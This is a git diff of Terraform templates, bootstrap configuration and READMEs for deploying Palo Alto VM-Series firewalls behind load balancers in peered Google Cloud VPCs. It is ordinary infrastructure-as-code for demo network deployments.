module.vm_spoke1.instance_group[0] + failover = false + }, + { + group = module.vm_spoke1.instance_group[1] + failover = false + } + ] + } + providers = { + google = google-beta + } +} + +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "${var.trust_vpc}-to-${var.spoke1_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke1.vpc_self_link + export_custom_routes = true +} + +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "${var.spoke1_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke1.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke1] +} + +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with VM. Create peer link with trust VPC. +module "vpc_spoke2" { + source = "./modules/vpc/" + vpc = var.spoke2_vpc + subnets = var.spoke2_subnets + cidrs = var.spoke2_cidrs + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke2" { + source = "./modules/vm/" + names = var.spoke2_vms + zones = [data.google_compute_zones.available.names[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + subnetworks = [module.vpc_spoke2.subnetwork_self_link[0]] + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "${var.trust_vpc}-to-${var.spoke2_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke2.vpc_self_link + export_custom_routes = true + + depends_on = [google_compute_network_peering.spoke1_to_trust] +} + +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "${var.spoke2_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke2.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke2] +} + diff --git a/gcp/adv_peering_4fw_2spoke/terraform.tfvars b/gcp/adv_peering_4fw_2spoke/terraform.tfvars new file mode 100644 index 00000000..df20d345 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/terraform.tfvars @@ -0,0 +1,44 @@ +#project_id = "" +#public_key_path = "~/.ssh/gcp-demo.pub" + +#fw_panos = "byol-904" +#fw_panos = "bundle1-904" +#fw_panos = "bundle2-904" + + +#------------------------------------------------------------------- +region = "us-east4" + +mgmt_vpc = "mgmt-vpc" +mgmt_subnet = ["mgmt"] +mgmt_cidr = ["192.168.0.0/24"] +mgmt_sources = ["0.0.0.0/0"] + +untrust_vpc = "untrust-vpc" +untrust_subnet = ["untrust"] +untrust_cidr = ["192.168.1.0/24"] + +trust_vpc = "trust-vpc" +trust_subnet = ["trust"] +trust_cidr = ["192.168.2.0/24"] + +spoke1_vpc = "spoke1-vpc" +spoke1_subnets = ["spoke1-subnet1"] +spoke1_cidrs = ["10.10.1.0/24"] +spoke1_vms = ["spoke1-vm1", "spoke1-vm2"] +spoke1_ilb = "spoke1-ilb" +spoke1_ilb_ip = "10.10.1.100" + +spoke2_vpc = "spoke2-vpc" +spoke2_subnets = ["spoke2-subnet1"] +spoke2_cidrs = ["10.10.2.0/24"] +spoke2_vms = ["spoke2-vm1"] +spoke_user = "demo" + +fw_names_inbound = ["vmseries01", "vmseries02"] +fw_names_outbound = ["vmseries03", "vmseries04"] +fw_machine_type = "n1-standard-4" + +glb_name = "vmseries-glb" +ilb_name = "vmseries-ilb" + diff --git a/gcp/adv_peering_4fw_2spoke/variables.tf b/gcp/adv_peering_4fw_2spoke/variables.tf new file mode 100644 index 00000000..780f0a40 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/variables.tf @@ -0,0 +1,116 @@ +variable "project_id" { + description = "GCP Project ID" +} + +# variable "auth_file" { +# description = "GCP Project auth file" +# } + +variable "region" { +} + +variable "fw_panos" { + description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)" +} + +variable "fw_image" { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" +} + +variable "fw_names_inbound" { + type = list(string) +} + +variable "fw_names_outbound" { + type = list(string) +} + +variable "fw_machine_type" { +} + +variable "glb_name" { +} + +variable "ilb_name" { +} + +variable "mgmt_vpc" { +} + +variable "mgmt_subnet" { + type = list(string) +} + +variable "mgmt_cidr" { + type = list(string) +} + +variable "untrust_vpc" { +} + +variable "untrust_subnet" { + type = list(string) +} + +variable "untrust_cidr" { + type = list(string) +} + +variable "trust_vpc" { +} + +variable "trust_subnet" { + type = list(string) +} + +variable "trust_cidr" { + type = list(string) +} + +variable "mgmt_sources" { + type = list(string) +} + +variable "spoke1_vpc" { +} + +variable "spoke1_subnets" { + type = list(string) +} + +variable "spoke1_cidrs" { + type = list(string) +} + +variable "spoke1_vms" { + type = list(string) +} + +variable "spoke1_ilb" { +} + +variable "spoke1_ilb_ip" { +} + +variable "spoke2_vpc" { +} + +variable "spoke2_subnets" { + type = list(string) +} + +variable "spoke2_cidrs" { + type = list(string) +} + +variable "spoke2_vms" { + type = list(string) +} + +variable "spoke_user" { + description = "SSH user for spoke Linux VM" +} + +variable "public_key_path" { + description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin" +} diff --git a/gcp/gcp-ilbnh/README.md b/gcp/gcp-ilbnh/README.md new file mode 100644 index 00000000..904ccc45 --- /dev/null +++ b/gcp/gcp-ilbnh/README.md @@ -0,0 +1,22 @@ +# gcp-ilbnh +ILB as next hop in GCP\ +This repository is intended to be used in conjunction with the 2-spoke advanced peering demo template: + +https://github.com/wwce/terraform/tree/master/gcp/adv_peering_2fw_2spoke + +This template may be used simultaneouly with or subsequent to the advanced peering template and will create an additional pair of FW behind an internal load balancer that can be used for outbound loadbalancing of TCP (only) traffic to provide redundancy of outbound connectivity. + +ILB as next hop is not currently GA. Consequently, routes will need to be modified post-deployment with the following gcloud CLI command: + +gcloud beta compute routes create default-ilbnh \\ \ +--network=trust-vpc \\ \ +--destination-range=0.0.0.0/0 \\ \ +--next-hop-ilb=ilbnh-all \\ \ +--next-hop-ilb-region=\ \\ \ +--priority=99 + +N.B. - This template was developed/tested using Terraform 0.11. + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml new file mode 100644 index 00000000..9f506a10 --- /dev/null +++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml @@ -0,0 +1,632 @@ + + + + + + $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/ + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 35.191.0.0/16 + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + + + + + + + drop + no + yes + + + deny + no + yes + + + + + + + + + + ethernet1/2 + + + + + untrust + + + trust + + + any + + + any + + any + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + any + ethernet1/1 + + 100.64.0.1 + + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/gcp-ilbnh/ilbnh.tf b/gcp/gcp-ilbnh/ilbnh.tf new file mode 100644 index 00000000..45879ab7 --- /dev/null +++ b/gcp/gcp-ilbnh/ilbnh.tf @@ -0,0 +1,66 @@ +provider "google" { + credentials = "${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" + alias = "ilbnh" +} +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH +#************************************************************************************ +module "bootstrap_ilbnh" { + source = "./modules/create_bootstrap_bucket_ilbnh/" + bucket_name = "vmseries-ilbnh" + randomize_bucket_name = true + file_location = "bootstrap_files_ilbnh/" + enable_ilbnh = "${var.enable_ilbnh}" + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} + +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH +#************************************************************************************ +module "vm_fw_ilbnh" { + source = "./modules/create_vmseries_ilbnh/" + fw_names = ["vmseries03", "vmseries04"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_untrust.subnetwork_self_link[0]}"] + enable_ilbnh = "${var.enable_ilbnh}" + fw_nic0_ip = ["192.168.2.4", "192.168.2.5"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.0.4", "192.168.0.5"] + fw_nic2_ip = ["192.168.1.4", "192.168.1.5"] + + fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group" + + dependencies = [ + "${module.bootstrap_ilbnh.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +module "vmseries_internal_lb_ilbnh" { + source = "./modules/create_ilbnh/" + internal_lb_name_ilbnh = "ilbnh" + internal_lb_ports_ilbnh = "22" + subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}"] + internal_lbnh_ip = "192.168.2.6" + enable_ilbnh = "${var.enable_ilbnh}" + backends = [ + { + group = "${module.vm_fw_ilbnh.instance_group[0]}" + }, + { + group = "${module.vm_fw_ilbnh.instance_group[1]}" + }, + ] +} diff --git a/gcp/gcp-ilbnh/ilbnh_override.tf b/gcp/gcp-ilbnh/ilbnh_override.tf new file mode 100644 index 00000000..d3bb02dd --- /dev/null +++ b/gcp/gcp-ilbnh/ilbnh_override.tf @@ -0,0 +1,7 @@ +#************************************************************************************ +# ILBNH +#************************************************************************************ +variable "enable_ilbnh" { + description = "If set to true, enable ILB as Next Hop" + default = true +} diff --git a/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf new file mode 100644 index 00000000..23092e2b --- /dev/null +++ b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf @@ -0,0 +1,124 @@ +variable enable_ilbnh { + default = false +} +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + count = "${var.enable_ilbnh ? 1 : 0}" + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${(length(var.config) > 0 && var.enable_ilbnh) ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${(length(var.content) > 0 && var.enable_ilbnh) ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${(length(var.license) > 0 && var.enable_ilbnh) ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${(length(var.software) > 0 && var.enable_ilbnh) ? length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${(length(var.config) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "config/" + content = "config/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${(length(var.content) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${(length(var.license) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "license/" + content = "license/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${(length(var.software) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "software/" + content = "software/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} diff --git a/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf new file mode 100644 index 00000000..52e818e9 --- /dev/null +++ b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf @@ -0,0 +1,51 @@ +variable enable_ilbnh { + default = false +} +variable "internal_lb_name_ilbnh" { + default = "ilbnh" +} +variable "internal_lb_ports_ilbnh" { + default = "22" +} +variable backends { + description = "Map backend indices to list of backend maps." + type = "list" +} +variable subnetworks { + type = "list" +} +variable "internal_lbnh_ip" { + default = "" +} +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +resource "google_compute_health_check" "health_check_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-check" + count = "${var.enable_ilbnh ? 1 : 0}" + + tcp_health_check { + port = "${var.internal_lb_ports_ilbnh}" + } +} + +resource "google_compute_region_backend_service" "backend_service_ilbnh" { + name = "${var.internal_lb_name_ilbnh}" + count = "${var.enable_ilbnh ? 1 : 0}" + health_checks = ["${google_compute_health_check.health_check_ilbnh.self_link}"] + backend = ["${var.backends}"] + session_affinity = "CLIENT_IP" + +} + + +resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-all" + count = "${var.enable_ilbnh ? 1 : 0}" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lbnh_ip}" + ip_protocol = "TCP" + all_ports = true + subnetwork = "${var.subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}" +} \ No newline at end of file diff --git a/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf new file mode 100644 index 00000000..dcfa2fae --- /dev/null +++ b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf @@ -0,0 +1,172 @@ +variable enable_ilbnh { + default = false +} +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = "list" + default = [] +} +variable instance_group { + type = "list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${(length(var.fw_names) > 0 && var.enable_ilbnh) ? length(var.fw_names) : "0" }" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + access_config = {} + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + +#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group && var.enable_ilbnh) ? length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] +} + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}" +} + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}" +} diff --git a/gcp/gcp-terraform-mclimans/README.md b/gcp/gcp-terraform-mclimans/README.md deleted file mode 100644 index 7b55a4f9..00000000 --- a/gcp/gcp-terraform-mclimans/README.md +++ /dev/null @@ -1 +0,0 @@ -GCP terraform builds by mmclimans@paloaltonetworks.com diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/README.md b/gcp/gcp-terraform-mclimans/demo_deployments/README.md deleted file mode 100644 index 3993db83..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/README.md +++ /dev/null @@ -1 +0,0 @@ -Demo deployments for testing and demonstrations in isolated enviroments. Do not use in any production environments. diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub deleted file mode 100644 index 14ab5c49..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub +++ /dev/null @@ -1 +0,0 @@ -REPLACE THIS FILE WITH YOUR PUBLIC KEY FOR SSH ACCESS TO BACKEND VMs \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json deleted file mode 100644 index b3acf687..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json +++ /dev/null @@ -1,3 +0,0 @@ -{ - "comment": "REPLACE THIS FILE WITH YOUR GCE API KEY (JSON FORMAT)" -} \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf deleted file mode 100644 index 4a522608..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf +++ /dev/null @@ -1,355 +0,0 @@ -/* -************************************************************************************************************* -** ** -** author: mmclimans ** -** date: 4/1/19 ** -** contact: mmclimans@paloaltonetworks.com ** -** ** -** SUPPORT POLICY ** -** ** -** This build is released under an as-is, best effort, support policy. ** -** These scripts should be seen as community supported and Palo Alto Networks will contribute our ** -** expertise as and when possible. We do not provide technical support or help in using or ** -** troubleshooting the components of the project through our normal support options such as ** -** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support ** -** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still ** -** supported, but the support is only for the product functionality and not for help in deploying or ** -** using the template or script itself. Unless explicitly tagged, all projects or work posted in our ** -** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads ** -** page on https://support.paloaltonetworks.com are provided under the best effort policy. ** -** ** -************************************************************************************************************* -*/ - -# SET AUTHENTICATION TO GCE API -provider "google" { - credentials = "${file(var.gcp_credentials_file)}" - project = "${var.my_gcp_project}" - region = "${var.region}" -} - -############################################################################################ -############################################################################################ -# CREATE BUCKET & UPLOAD VMSERIES BOOTSTRAP FILES -resource "google_storage_bucket" "bootstrap" { - name = "${var.bootstrap_bucket}" - force_destroy = true -} -resource "google_storage_bucket_object" "bootstrap_xml" { - name = "config/bootstrap.xml" - source = "bootstrap/bootstrap.xml" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "init-cfg" { - name = "config/init-cfg.txt" - source = "bootstrap/init-cfg.txt" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "content" { - name = "content/panupv2-all-contents-8138-5378" - source = "bootstrap/panupv2-all-contents-8138-5378" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "software" { - name = "software/" - source = "/dev/null" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "license" { - name = "license/" - source = "/dev/null" - bucket = "${google_storage_bucket.bootstrap.name}" -} - - -############################################################################################ -############################################################################################ -# CREATE VPCS AND SUBNETS -resource "google_compute_network" "mgmt" { - name = "${var.mgmt_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "mgmt_subnet" { - name = "${var.mgmt_vpc_subnet}" - ip_cidr_range = "${var.mgmt_vpc_subnet_cidr}" - network = "${google_compute_network.mgmt.name}" - region = "${var.region}" -} -resource "google_compute_network" "untrust" { - name = "${var.untrust_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "untrust_subnet" { - name = "${var.untrust_vpc_subnet}" - ip_cidr_range = "${var.untrust_vpc_subnet_cidr}" - network = "${google_compute_network.untrust.name}" - region = "${var.region}" -} -resource "google_compute_network" "web" { - name = "${var.web_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "web_subnet" { - name = "${var.web_vpc_subnet}" - ip_cidr_range = "${var.web_vpc_subnet_cidr}" - network = "${google_compute_network.web.name}" - region = "${var.region}" -} -resource "google_compute_network" "db" { - name = "${var.db_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "db_subnet" { - name = "${var.db_vpc_subnet}" - ip_cidr_range = "${var.db_vpc_subnet_cidr}" - network = "${google_compute_network.db.name}" - region = "${var.region}" -} - - -############################################################################################ -############################################################################################ -# CREATE GCP VPC ROUTES -resource "google_compute_route" "web_vpc_route" { - name = "web-vpc-route" - dest_range = "0.0.0.0/0" - network = "${google_compute_network.web.name}" - next_hop_ip = "${var.fw_nic2_ip}" - priority = 100 - depends_on = [ - "google_compute_instance.firewall", - "google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} -resource "google_compute_route" "db_vpc_route" { - name = "db-vpc-route" - dest_range = "0.0.0.0/0" - network = "${google_compute_network.db.name}" - next_hop_ip = "${var.fw_nic3_ip}" - priority = 100 - depends_on = [ - "google_compute_instance.firewall", - "google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} - - -############################################################################################ -############################################################################################ -# CREATE GCP VPC FIREWALL RULES -resource "google_compute_firewall" "mgmt_vpc_ingress" { - name = "mgmt-ingress" - network = "${google_compute_network.mgmt.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "icmp" - } - allow { - protocol = "tcp" - ports = ["443", "22", "3897"] - } 